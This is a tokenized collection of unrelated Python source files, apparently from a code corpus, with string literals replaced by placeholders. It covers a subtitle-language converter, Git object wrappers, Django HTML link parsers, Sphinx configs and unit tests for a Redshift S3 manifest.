<s> from babelfish import LanguageReverseConverter <EOL> from subliminal . exceptions import ConfigurationError <EOL> class TheSubDBConverter ( LanguageReverseConverter ) : <EOL> def __init__ ( self ) : <EOL> self . from_thesubdb = { '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) , '<STR_LIT>' : ( '<STR_LIT>' , ) } <EOL> self . to_thesubdb = { v : k for k , v in self . from_thesubdb . items ( ) } <EOL> self . codes = set ( self . from_thesubdb . keys ( ) ) <EOL> def convert ( self , alpha3 , country = None , script = None ) : <EOL> if ( alpha3 , country ) in self . to_thesubdb : <EOL> return self . to_thesubdb [ ( alpha3 , country ) ] <EOL> if ( alpha3 , ) in self . to_thesubdb : <EOL> return self . to_thesubdb [ ( alpha3 , ) ] <EOL> raise ConfigurationError ( '<STR_LIT>' % ( alpha3 , country , script ) ) <EOL> def reverse ( self , thesubdb ) : <EOL> if thesubdb in self . from_thesubdb : <EOL> return self . from_thesubdb [ thesubdb ] <EOL> raise ConfigurationError ( '<STR_LIT>' % thesubdb ) </s>
<s> import urllib2 , cookielib <EOL> from bs4 import BeautifulSoup <EOL> urls = [ "<STR_LIT>" ] <EOL> for u in urls : <EOL> cj = cookielib . CookieJar ( ) <EOL> opener = urllib2 . build_opener ( urllib2 . HTTPCookieProcessor ( cj ) ) <EOL> request = urllib2 . Request ( u ) <EOL> request . add_header ( '<STR_LIT>' , "<STR_LIT:test>" ) <EOL> response = opener . open ( request ) <EOL> bs = BeautifulSoup ( response ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' </s>
<s> import csv <EOL> from datetime import datetime <EOL> from StringIO import StringIO <EOL> from collections import namedtuple <EOL> DATE_FMT = "<STR_LIT>" <EOL> Customer = namedtuple ( '<STR_LIT>' , ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:state>' , '<STR_LIT>' ) ) <EOL> def parse ( row ) : <EOL> """<STR_LIT>""" <EOL> row [ <NUM_LIT:0> ] = int ( row [ <NUM_LIT:0> ] ) <EOL> row [ <NUM_LIT:4> ] = datetime . strptime ( row [ <NUM_LIT:4> ] , DATE_FMT ) <EOL> return Customer ( * row ) <EOL> def split ( line ) : <EOL> """<STR_LIT>""" <EOL> reader = csv . reader ( StringIO ( line ) ) <EOL> return reader . next ( ) </s>
<s> from abc import ABCMeta , abstractmethod <EOL> from utils . system import run_command <EOL> from utils . date import time_to_utc <EOL> GIT_BLOB_OBJECT = '<STR_LIT>' <EOL> GIT_TREE_OBJECT = '<STR_LIT>' <EOL> GIT_COMMIT_OBJECT = '<STR_LIT>' <EOL> GIT_VALID_OBJECT_KINDS = [ GIT_BLOB_OBJECT , GIT_TREE_OBJECT , GIT_COMMIT_OBJECT ] <EOL> class GitObject : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = ABCMeta <EOL> @ abstractmethod <EOL> def __init__ ( self , repo , kind , rev ) : <EOL> assert repo is not None , '<STR_LIT>' <EOL> assert repo . is_valid ( ) , '<STR_LIT>' <EOL> self . repo = repo <EOL> self . kind = kind <EOL> self . rev = rev <EOL> def is_blob ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind == GIT_BLOB_OBJECT <EOL> def is_tree ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind == GIT_TREE_OBJECT <EOL> def is_commit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind == GIT_COMMIT_OBJECT <EOL> def get_repo ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . repo <EOL> def get_kind ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . kind <EOL> def get_revision ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . rev <EOL> @ abstractmethod <EOL> def get_subject ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def get_committer_date ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def get_committer_email ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def get_committer_name ( self ) : <EOL> pass <EOL> @ abstractmethod <EOL> def show ( self ) : <EOL> pass <EOL> class GitBlob ( GitObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , repo , path , rev = '<STR_LIT>' ) : <EOL> assert path is not None , '<STR_LIT>' <EOL> super ( GitBlob , self ) . __init__ ( repo , GIT_BLOB_OBJECT , rev ) <EOL> self . path = path <EOL> def get_path ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . path <EOL> def get_subject ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . 
path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_date ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return time_to_utc ( git_output . strip ( ) ) <EOL> def get_committer_email ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_name ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> level = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> file_content = run_command ( cmd = '<STR_LIT>' . format ( level ) , data = None , location = self . repo . location , chw = True ) <EOL> return file_content <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . format ( self . path , self . rev , self . repo ) <EOL> class GitTree ( GitObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , repo , path , rev = '<STR_LIT>' ) : <EOL> assert path is not None , '<STR_LIT>' <EOL> super ( GitTree , self ) . __init__ ( repo , GIT_TREE_OBJECT , rev ) <EOL> self . path = path <EOL> def get_path ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . path <EOL> def get_subject ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . 
strip ( ) <EOL> return git_output <EOL> def get_committer_date ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return time_to_utc ( git_output . strip ( ) ) <EOL> def get_committer_email ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_name ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> level = '<STR_LIT>' . format ( self . rev , self . path ) <EOL> cmd = '<STR_LIT>' . format ( level ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . split ( '<STR_LIT:\n>' ) [ : - <NUM_LIT:1> ] <EOL> tree_contents = [ ] <EOL> for item in git_output : <EOL> kind , path = item . split ( ) [ <NUM_LIT:1> ] , '<STR_LIT>' . format ( self . path , item . split ( ) [ <NUM_LIT:3> ] ) <EOL> if kind == GIT_BLOB_OBJECT : <EOL> tree_contents . append ( GitBlob ( repo = self . repo , path = path , rev = self . rev ) ) <EOL> elif kind == GIT_TREE_OBJECT : <EOL> tree_contents . append ( GitTree ( repo = self . repo , path = path , rev = self . rev ) ) <EOL> return tree_contents <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . format ( self . path , self . rev , self . repo ) <EOL> class GitCommit ( GitObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , repo , sha1_hash , rev = '<STR_LIT>' ) : <EOL> assert sha1_hash is not None , '<STR_LIT>' <EOL> super ( GitCommit , self ) . 
__init__ ( repo , GIT_COMMIT_OBJECT , rev ) <EOL> self . sha1_hash = sha1_hash <EOL> def get_sha1_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . sha1_hash <EOL> def get_subject ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_date ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return time_to_utc ( git_output . strip ( ) ) <EOL> def get_committer_email ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def get_committer_name ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . rev , self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) . strip ( ) <EOL> return git_output <EOL> def show ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( self . sha1_hash ) <EOL> git_output = run_command ( cmd = cmd , data = None , location = self . repo . location , chw = True ) <EOL> return git_output <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . format ( self . sha1_hash , self . rev , self . repo ) </s>
<s> import threading <EOL> from django . conf import settings <EOL> try : <EOL> from django . utils . html_parser import HTMLParser <EOL> except ImportError : <EOL> from HTMLParser import HTMLParser <EOL> update_lock = threading . Lock ( ) <EOL> class Lister ( HTMLParser ) : <EOL> def reset ( self ) : <EOL> HTMLParser . reset ( self ) <EOL> self . urls = [ ] <EOL> class URLLister ( Lister ) : <EOL> def __init__ ( self ) : <EOL> self . in_a = False <EOL> self . text = '<STR_LIT>' <EOL> self . url = '<STR_LIT>' <EOL> HTMLParser . __init__ ( self ) <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> if tag == '<STR_LIT:a>' : <EOL> href = [ v for k , v in attrs if k == '<STR_LIT>' ] <EOL> if href : <EOL> self . in_a = True <EOL> self . url = href [ <NUM_LIT:0> ] <EOL> elif tag == '<STR_LIT>' and self . in_a : <EOL> src = [ v for k , v in attrs if k == '<STR_LIT:src>' ] <EOL> if src : <EOL> self . text += '<STR_LIT>' % src [ <NUM_LIT:0> ] <EOL> def handle_endtag ( self , tag ) : <EOL> if tag == '<STR_LIT:a>' and self . in_a : <EOL> self . urls . append ( ( self . text [ : <NUM_LIT> ] , self . url ) ) <EOL> self . in_a = False <EOL> self . text = '<STR_LIT>' <EOL> self . url = '<STR_LIT>' <EOL> def handle_data ( self , data ) : <EOL> if self . in_a : <EOL> self . text += data <EOL> class ImageLister ( Lister ) : <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> if tag == '<STR_LIT>' : <EOL> src = [ v for k , v in attrs if k == '<STR_LIT:src>' ] <EOL> if src : <EOL> self . urls . append ( ( '<STR_LIT>' , src [ <NUM_LIT:0> ] ) ) <EOL> class AnchorLister ( HTMLParser ) : <EOL> def __init__ ( self ) : <EOL> self . names = [ ] <EOL> HTMLParser . __init__ ( self ) <EOL> def reset ( self ) : <EOL> HTMLParser . reset ( self ) <EOL> self . names = [ ] <EOL> def handle_starttag ( self , tag , attributes ) : <EOL> name = [ v for k , v in attributes if k == '<STR_LIT:id>' ] <EOL> if name : <EOL> self . names . 
append ( name [ <NUM_LIT:0> ] ) <EOL> if tag == '<STR_LIT:a>' : <EOL> name = [ v for k , v in attributes if k == '<STR_LIT:name>' ] <EOL> if name : <EOL> self . names . append ( name [ <NUM_LIT:0> ] ) <EOL> def parse ( obj , field , parser ) : <EOL> html = getattr ( obj , field ) <EOL> if html : <EOL> parser . feed ( html ) <EOL> parser . close ( ) <EOL> return parser . urls <EOL> else : <EOL> return [ ] <EOL> def parse_urls ( obj , field ) : <EOL> parser = URLLister ( ) <EOL> return parse ( obj , field , parser ) <EOL> def parse_images ( obj , field ) : <EOL> parser = ImageLister ( ) <EOL> return parse ( obj , field , parser ) <EOL> def parse_anchors ( content ) : <EOL> parser = AnchorLister ( ) <EOL> parser . feed ( content ) <EOL> parser . close ( ) <EOL> return parser . names <EOL> class Linklist ( object ) : <EOL> html_fields = [ ] <EOL> url_fields = [ ] <EOL> ignore_empty = [ ] <EOL> image_fields = [ ] <EOL> object_filter = None <EOL> object_exclude = None <EOL> def __get ( self , name , obj , default = None ) : <EOL> try : <EOL> attr = getattr ( self , name ) <EOL> except AttributeError : <EOL> return default <EOL> if callable ( attr ) : <EOL> return attr ( obj ) <EOL> return attr <EOL> @ staticmethod <EOL> def extract_url_from_field ( obj , field_name ) : <EOL> val = getattr ( obj , field_name ) <EOL> try : <EOL> try : <EOL> url = val . url <EOL> except ValueError : <EOL> url = '<STR_LIT>' <EOL> except AttributeError : <EOL> url = val <EOL> return url or '<STR_LIT>' <EOL> def get_urls_from_field_list ( self , obj , field_list ) : <EOL> urls = [ ] <EOL> for field_name in field_list : <EOL> url = self . extract_url_from_field ( obj , field_name ) <EOL> if field_name in self . ignore_empty and not url : <EOL> continue <EOL> urls . append ( ( field_name , '<STR_LIT>' , url ) ) <EOL> return urls <EOL> def urls ( self , obj ) : <EOL> urls = [ ] <EOL> for field_name in self . 
html_fields : <EOL> urls += [ ( field_name , text , url ) for text , url in parse_urls ( obj , field_name ) ] <EOL> urls += self . get_urls_from_field_list ( obj , self . url_fields ) <EOL> return urls <EOL> def images ( self , obj ) : <EOL> urls = [ ] <EOL> for field_name in self . html_fields : <EOL> urls += [ ( field_name , text , url ) for text , url in parse_images ( obj , field_name ) ] <EOL> urls += self . get_urls_from_field_list ( obj , self . image_fields ) <EOL> return urls <EOL> @ classmethod <EOL> def objects ( cls ) : <EOL> objects = cls . model . objects . all ( ) <EOL> if cls . object_filter : <EOL> objects = objects . filter ( ** cls . object_filter ) . distinct ( ) <EOL> if cls . object_exclude : <EOL> objects = objects . exclude ( ** cls . object_exclude ) . distinct ( ) <EOL> return objects <EOL> def get_linklist ( self , extra_filter = None ) : <EOL> extra_filter = extra_filter or { } <EOL> linklist = [ ] <EOL> objects = self . objects ( ) <EOL> if extra_filter : <EOL> objects = objects . filter ( ** extra_filter ) <EOL> for obj in objects : <EOL> linklist . append ( { <EOL> '<STR_LIT:object>' : obj , <EOL> '<STR_LIT>' : self . urls ( obj ) , <EOL> '<STR_LIT>' : self . images ( obj ) , <EOL> } ) <EOL> return linklist <EOL> @ classmethod <EOL> def content_type ( cls ) : <EOL> from django . contrib . contenttypes . models import ContentType <EOL> return ContentType . objects . get_for_model ( cls . model ) </s>
<s> import sys <EOL> import os <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> autodoc_member_order = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT:1.0>' <EOL> release = '<STR_LIT:1.0>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = "<STR_LIT:default>" <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = "<STR_LIT>" <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> import requests <EOL> import simplejson as json <EOL> USERDATA = '<STR_LIT>' <EOL> def retrieveUserData ( url ) : <EOL> '''<STR_LIT>''' <EOL> req = requests . get ( url ) <EOL> content = json . loads ( req . content ) <EOL> filteredData = [ ] <EOL> data = { } <EOL> data [ '<STR_LIT:name>' ] = content [ '<STR_LIT:name>' ] <EOL> data [ '<STR_LIT>' ] = content [ '<STR_LIT>' ] . upper ( ) <EOL> data [ '<STR_LIT>' ] = content [ '<STR_LIT>' ] <EOL> data [ '<STR_LIT:state>' ] = content [ '<STR_LIT:state>' ] <EOL> data [ '<STR_LIT:status>' ] = content [ '<STR_LIT:status>' ] <EOL> filteredData . append ( data ) <EOL> return filteredData </s>
<s> from django . db import models <EOL> from django . core . urlresolvers import reverse <EOL> from markitup . fields import MarkupField <EOL> from cardbox . deck_model import Deck <EOL> class Card ( models . Model ) : <EOL> ID = models . AutoField ( primary_key = True ) <EOL> deck = models . ForeignKey ( Deck ) <EOL> front = MarkupField ( ) <EOL> back = MarkupField ( ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> def __unicode__ ( self ) : <EOL> return self . front . raw <EOL> def get_absolute_url ( self ) : <EOL> """<STR_LIT>""" <EOL> return reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . ID } ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> from django . conf import settings <EOL> settings . configure ( ) <EOL> settings . STATIC_URL = '<STR_LIT>' <EOL> settings . STATIC_ROOT = '<STR_LIT>' <EOL> settings . ANONYMOUS_USER_ID = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> import sphinx_rtd_theme <EOL> html_theme = "<STR_LIT>" <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] </s>
<s> import os <EOL> def env ( name ) : <EOL> return os . environ . get ( name ) </s>
<s> import unittest <EOL> from boto . s3 . key import Key <EOL> from mock import Mock , patch , mock_open , create_autospec , call <EOL> from arbalest . redshift . manifest import SqlManifest <EOL> from arbalest . redshift . schema import Property , JsonObject <EOL> from arbalest . s3 import Bucket <EOL> from arbalest . sql import Database <EOL> from test import BUCKET_NAME , TABLE_NAME , AWS_ACCESS_KEY_ID , AWS_SECRET_ACCESS_KEY <EOL> class SqlManifestShould ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . schema = JsonObject ( TABLE_NAME , Property ( '<STR_LIT:id>' , '<STR_LIT>' ) ) <EOL> self . bucket = Bucket ( AWS_ACCESS_KEY_ID , AWS_SECRET_ACCESS_KEY , <EOL> BUCKET_NAME , Mock ( ) ) <EOL> self . bucket . save = Mock ( ) <EOL> self . database = create_autospec ( Database ) <EOL> self . key_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . bucket . list = Mock ( <EOL> return_value = [ self . mock_key ( key ) for key in self . key_names ] ) <EOL> self . manifest = SqlManifest ( metadata = '<STR_LIT>' , <EOL> source = '<STR_LIT>' , <EOL> schema = self . schema , <EOL> bucket = self . bucket , <EOL> db_connection = self . database ) <EOL> self . expected_manifest = { '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . 
format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } <EOL> ] } <EOL> def mock_key ( self , name ) : <EOL> return Key ( Mock ( ) , name ) <EOL> def mock_key_exists ( self , key_name , exists ) : <EOL> key = self . mock_key ( key_name ) <EOL> key . exists = Mock ( return_value = exists ) <EOL> key . get_contents_to_filename = Mock ( ) <EOL> self . bucket . get = Mock ( return_value = key ) <EOL> return key <EOL> def mock_journal ( self , exists , key_names = None ) : <EOL> self . mock_key_exists ( self . manifest . journal_key , exists ) <EOL> if exists : <EOL> self . database . fetchall = Mock ( <EOL> return_value = ( ( key , ) for key in key_names ) ) <EOL> def test_have_all_keys ( self ) : <EOL> self . assertEqual ( self . key_names , list ( self . manifest . all_keys ) ) <EOL> def test_have_manifest_key ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . manifest . manifest_key ) <EOL> def test_have_journal_key ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . manifest . journal_key ) <EOL> def test_have_manifest_url ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' . format ( BUCKET_NAME ) , <EOL> self . manifest . manifest_url ) <EOL> def test_have_empty_journal ( self ) : <EOL> self . mock_journal ( False ) <EOL> self . assertEqual ( [ ] , list ( self . manifest . journal ( ) ) ) <EOL> self . database . open . assert_called_once_with ( ) <EOL> sql = '<STR_LIT>' <EOL> self . database . execute . assert_called_once_with ( sql ) <EOL> self . database . commit . assert_called_once_with ( ) <EOL> self . database . close . assert_called_once_with ( ) <EOL> def test_have_journal ( self ) : <EOL> self . mock_journal ( True , self . key_names ) <EOL> self . assertEqual ( self . key_names , list ( self . manifest . journal ( ) ) ) <EOL> self . database . open . assert_called_once_with ( ) <EOL> sql = '<STR_LIT>' <EOL> self . database . 
# Tail of the preceding test: final assertion of a test method whose `def`
# line lies before this chunk (verifies a single SQL execution on the mock).
execute.assert_called_once_with(sql)

def test_have_manifest_when_journal_is_empty(self):
    """With an empty journal, the manifest reports the expected entry URLs."""
    self.mock_journal(False)
    # Entry URLs from the fixture manifest.
    expected_entries = set(
        [entry['<STR_LIT:url>'] for entry in
         self.expected_manifest['<STR_LIT>']])
    # Entry URLs actually produced by the manifest under test.
    actual_entries = set(
        [entry['<STR_LIT:url>'] for entry in
         self.manifest.get()['<STR_LIT>']['<STR_LIT>']])
    self.assertEqual(expected_entries, actual_entries)

def test_update_existing_manifest_when_key_not_in_journal(self):
    """A bucket key absent from the journal shows up as a new manifest entry."""
    # Journal already contains every currently known key.
    self.mock_journal(True, list(self.key_names))
    # Add one key the journal has not seen yet.
    self.key_names.append(
        '<STR_LIT>')
    self.bucket.list = Mock(
        return_value=[self.mock_key(key) for key in self.key_names])
    # Only the un-journaled key is reported (flagged True —
    # presumably "new/changed"; confirm against the Manifest implementation).
    self.assertEqual([{
        '<STR_LIT:url>': '<STR_LIT>'.format(
            BUCKET_NAME),
        '<STR_LIT>': True}],
        list(self.manifest.get()['<STR_LIT>']['<STR_LIT>']))

def test_save(self):
    """save() rewrites the manifest file and uploads it to the bucket key."""
    f = mock_open()
    self.mock_journal(False)
    key = self.mock_key(self.manifest.manifest_key)
    key.set_contents_from_filename = Mock()
    key.get_contents_to_filename = Mock()
    self.bucket.get = Mock(return_value=key)
    # Patch open() in the module under test so no real file is touched.
    with patch('<STR_LIT>', f, create=True):
        self.manifest.save()
    f.assert_called_once_with(self.manifest.file_name, '<STR_LIT:wb>')
    handle = f()
    # The file is rewound first and truncated twice during the rewrite.
    self.assertEqual(call(<NUM_LIT:0>), handle.seek.call_args_list[<NUM_LIT:0>])
    self.assertEqual(<NUM_LIT:2>, handle.truncate.call_count)
    # Every expected line is written, in this exact order.
    self.assertEqual([call('<STR_LIT>'),
                      call('<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call(
                          '<STR_LIT>'),
                      call('<STR_LIT>')], handle.write.call_args_list)
    # The freshly written file is uploaded back to the bucket.
    key.set_contents_from_filename.assert_called_once_with(
        self.manifest.file_name)

def test_commit(self):
    """commit() records the keys in the journal DB and uploads the journal."""
    key = self.mock_key(self.manifest.journal_key)
    key.set_contents_from_filename = Mock()
    self.bucket.get = Mock(return_value=key)
    self.manifest.commit(self.key_names)
    self.database.open.assert_called_once_with()
    # One setup statement followed by parameterized inserts — presumably
    # one per committed key; confirm against Manifest.commit.
    inserts = [call('<STR_LIT>'),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',)),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',)),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',)),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',)),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',)),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',)),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',)),
               call('<STR_LIT>',
                    (
                        '<STR_LIT>',))]
    self.database.execute.assert_has_calls(inserts)
    # The transaction is committed and the connection closed.
    self.database.commit.assert_called_once_with()
    self.database.close.assert_called_once_with()
    # The journal file is uploaded back to the bucket.
    key.set_contents_from_filename.assert_called_once_with(
        self.manifest.journal_file_name)

def test_exist(self):
    """exists() is True when the manifest key is present in the bucket."""
    exists = True
    self.mock_key_exists(self.manifest.manifest_key, exists)
    self.assertEqual(exists, self.manifest.exists())

def test_not_exist(self):
    """exists() is False when the manifest key is absent from the bucket."""
    exists = False
    self.mock_key_exists(self.manifest.manifest_key, exists)
    self.assertEqual(exists, self.manifest.exists())

def test_have_journal_existence(self):
    """journal_exists() is True when the journal key is in the bucket."""
    exists = True
    self.mock_key_exists(self.manifest.journal_key, exists)
    self.assertEqual(exists, self.manifest.journal_exists())

def test_not_have_journal_existence(self):
    """journal_exists() is False when the journal key is absent."""
    exists = False
    self.mock_key_exists(self.manifest.journal_key, exists)
    self.assertEqual(exists, self.manifest.journal_exists())
import api
import re
